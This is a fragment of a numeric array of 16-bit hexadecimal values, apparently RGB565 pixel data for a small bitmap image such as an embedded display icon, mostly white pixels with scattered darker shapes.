0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xe7df, 0x1291, 0x0293, 0x859b, 0xffff, 0xf7ff, 0xf7ff, 0xf7fd, 0xfffe, 0xff9e, 0xffde, 0xf7ff, 0xefff, 0xefff, 0xdf7f, 0xcf7f, 0xbfbf, 0x8edf, 0x02b3, 0xbfff, 0xbf9f, 0xbf7f, 0xcf7f, 0xd75f, 0xcf9f, 0xc7df, 0xbfdf, 0xbfbf, 0xc77f, 0xcf9f, 0xc77f, 0xbf9f, 0xc79f, 0xc79f, 0xbf7f, 0xbfbf, 0xb7bf, 0xd75f, 0xd73f, 0xf7ff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xcf5f, 0x12f3, 0x0293, 0x8ddc, 0xffff, 0xffde, 0xffff, 0xfffd, 0xf7ff, 0xefff, 0xffff, 0xfffe, 0xffff, 0xd7ff, 0x124e, 0x5c95, 0xa6df, 0x0273, 0x02f8, 0x547a, 0xe79f, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xffde, 0xffdf, 0xffbe, 0xffdd, 0xffdc, 0xf7bf, 0xefdf, 0x4b34, 0x6c56, 0xe7ff, 0xf7ff, 0xfffd, 0xfffb, 0xfffa, 0xffde, 0xffbf, 0xffdf, 0xffde, 0xffbb, 0xfffd, 0xefff, 0x4418, 0x02f7, 0x0ab4, 0xa67e, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xb5d7, 0x8c92, 0xd6db, 0x9cf4, 0x9cd3, 0xc618, 0xffdf, 0xbdb7, 0x9493, 0xffff, 0x94d3, 0xe75d, 0xad76, 0x9d14, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xe71b, 0xa534, 0x8c51, 0xb596, 0xa534, 0x7bcf, 0xf7bf, 0xd6bb, 0x9cf4, 0xce59, 0x7c2f, 0xdf3b, 0x9d12, 0x94d1, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xe7ff, 0x12b2, 0x0ab4, 0x859c, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fd, 0xfffe, 0xffde, 0xf7de, 0xe7bf, 0xcf5f, 0x1a0d, 0x11eb, 0x1a2c, 0x124f, 0x1a92, 0x126f, 0x126b, 0x120b, 0x11ec, 0x19ed, 0x19ec, 0x124b, 0x126b, 0x120b, 0x222c, 0x220b, 0x220b, 0x1a0c, 0x1a2d, 0x1a0d, 0x1a2d, 0x1a4d, 0x124c, 0x21e8, 0x19a9, 0x8d17, 0xf7df, 0xffff, 0xf7df, 0xffff, 0xfffe, 0xfffe, 0xcf3f, 0x12d3, 0x0273, 0x95bc, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xfffe, 0xffbe, 0xffff, 0xe7ff, 0x5412, 0x2aee, 0xc7df, 0x0233, 0x1359, 0x0ad6, 0x1270, 0x9e1a, 0xdfff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xefff, 0xb6bf, 0x1252, 0x0a71, 0x3393, 0xae9d, 0xefff, 0xf7ff, 0xeffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xf7df, 0xae3d, 0x0251, 0x0358, 0x02f6, 0x4c36, 0xe7ff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7df, 0xdf1c, 0xad76, 0xefbf, 0x73cf, 0xef9e, 0xffff, 0x9491, 0xd6b9, 0xd6da, 0xffff, 0x8c51, 0x94b2, 0xffff, 0xffff, 0xce7a, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xdeda, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xef5e, 0xe71d, 0xf79f, 0xef7e, 0xdedc, 0xffff, 0xe79d, 0xdf1b, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xe7ff, 0x12b2, 0x0ab4, 0x859c, 0xffff, 0xffff, 0xfffe, 0xf7fd, 0xf7ff, 0xefff, 0xf7fe, 0xffbe, 0xf7ff, 0x5c15, 0x6497, 0xefff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xcf7f, 0x11aa, 0xefff, 0xffff, 0xffff, 0xf7df, 0xffdf, 0xfffe, 0xd73f, 0x12d3, 0x0273, 0x95bc, 0xffff, 0xfffe, 0xf7ff, 0xf7bf, 0xffff, 0xfffe, 0xfffe, 0xffbe, 0xffff, 0xffff, 0xc71d, 0x09ca, 0x965f, 0x6d3d, 0x0a93, 0x1357, 0x1377, 0x0292, 0x1ab0, 0x32ee, 0x2ace, 0x330f, 0x2a6e, 0x4310, 0x3aef, 0x2a8e, 0x4352, 0x120f, 0x0ad4, 0x0b97, 0x0316, 0x0a93, 0x32f3, 0x3ab0, 0x3acf, 0x2ace, 0x330f, 0x3310, 0x2af0, 0x3af2, 0x42f2, 0x11ee, 0x12d4, 0x1398, 0x0356, 0x0a70, 0xdfdf, 0xf7ff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xfffe, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xe7df, 0x1291, 0x0293, 0x859c, 0xffff, 0xffff, 0xffde, 0xfffe, 0xefff, 0xefff, 0xfffe, 0xffde, 0xf7df, 0x6457, 0x6497, 0xffff, 0xfffb, 0xffdd, 0xffff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xf7df, 0xb618, 0xce9a, 0xffff, 0xf7fe, 0xcf7f, 0x226d, 0xefff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xd75f, 0x1ab3, 0x0a73, 0x95bc, 0xffff, 0xffde, 0xf7ff, 0xf7ff, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffde, 0xfffe, 0xefff, 0x3311, 0x3354, 0xb71f, 0x1ab0, 0x1376, 0x0317, 0x2397, 0xc75f, 0xd79f, 0xdfdf, 0xcfbf, 0xd7df, 0xd7ff, 0xcfbf, 0xd7df, 0xdfff, 0xb6df, 0x3394, 0x02d4, 0x0b78, 0x0a94, 0x95ff, 0xe7bf, 0xe7bf, 0xc79f, 0xd7ff, 0xcfdf, 0xcfbf, 0xd7bf, 0xdf9f, 0xc73f, 0x43d5, 0x0271, 0x1b77, 0x0252, 0x8dbb, 0xefff, 0xfffd, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffbd, 0xffbc, 0xffff, 0x6478, 0x6498, 0xffff, 0xffdb, 0xfffc, 0xf7ff, 0xffff, 0xffbe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xadfa, 0x1a0c, 0x326e, 0xc69d, 0xf7fe, 0xcf7f, 0x1a6d, 0xe7ff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xcf3f, 0x1ad3, 0x0a53, 0x95bc, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdd, 0xffff, 0x859b, 0x01cd, 0xd7ff, 0x2b12, 0x1336, 0x0294, 0x8e1e, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xe7df, 0x7d5c, 0x0231, 0x6d3a, 0xe7ff, 0xf7df, 0xffbf, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xefdf, 0xe7ff, 0x7d5a, 0x1293, 0x1af7, 0x3b96, 0xdfff, 0xf7fd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbd, 0xffbc, 0xf7ff, 0x6498, 0x6498, 0xf7ff, 0xfffc, 0xeffc, 0xe7ff, 0xf7ff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xb69d, 0x01ab, 0x11ed, 0xd73f, 0xfffe, 0xbf3e, 0x1a4e, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xcf5f, 0x1ad3, 0x0a52, 0x95bc, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffd, 0xffde, 0xffff, 0xc73f, 0x1a6e, 0x6cd8, 0x85df, 0x0253, 0x0af5, 0x95db, 0xfffe, 0xff9b, 0xff9d, 0xffff, 0xffdd, 0xfffc, 0xfffd, 0xfffe, 0xfffe, 0xfffd, 0xf75d, 0xffff, 0x42f1, 0xae9c, 0xf7fe, 0xf7dc, 0xffbd, 0xfffe, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xfffd, 0xf7bd, 0xf7df, 0xefff, 0x4bd6, 0x0a75, 0x0a73, 0xb73f, 0xeffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffde, 0xfffd, 0xefff, 0x5c55, 0x6cb7, 0xf7ff, 0xfffd, 0xf7fe, 0xe7ff, 0xefff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7df, 0xefff, 0xdfff, 0xe7ff, 0xf7ff, 0xf7ff, 0xd79f, 0x1a4e, 0xefff, 0xffff, 0xffbd, 0xffff, 0xffde, 0xffff, 0xc75f, 0x1ad2, 0x0a72, 0x95bc, 0xffff, 0xfffe, 0xf7ff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffde, 0xffff, 0xf7ff, 0x5bb2, 0x32d0, 0xc77f, 0x1af6, 0x0ad4, 0x2b52, 0xd7ff, 0xfffd, 0xf7fe, 0xffdf, 0xffff, 0xffde, 0xfffd, 0xf7fe, 0xf7fd, 0xffbd, 0xffde, 0xffdf, 0xcede, 0x224b, 0xdfff, 0xffff, 0xffbd, 0xf7fd, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7be, 0xffde, 0xf7ff, 0xa67e, 0x0252, 0x0ad5, 0x4c56, 0xefff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffd, 0xffdd, 0xffdd, 0xffff, 0xffff, 0xf7bf, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7fe, 0xf7ff, 0xefff, 0x6cb6, 0x53f3, 0xdf9f, 0xe75e, 0xdf3e, 0xd75f, 0xd75e, 0xdf7d, 0xd75e, 0xd75d, 0xd75d, 0xdf3d, 0xd75e, 0xd75e, 0xd75e, 0xdf3e, 0xdf5e, 0xdf1d, 0xdf3d, 0xdf7d, 0xd75d, 0xd75e, 0xd75e, 0xdf5e, 0xe77f, 0xae1c, 0x19ec, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xc75f, 0x12f2, 0x0272, 0x95dc, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xf7df, 0xc69c, 0x094a, 0x9e7f, 0x4c7c, 0x12f5, 0x02d2, 0x8f3f, 0xeffe, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xffde, 0xff9c, 0xfffe, 0xefff, 0x1a4d, 0xbf3f, 0xefdf, 0xffff, 0xeffd, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xfffe, 0xf7fe, 0xd7ff, 0x2375, 0x0b36, 0x0ab2, 0xd7df, 0xffff, 0xffbf, 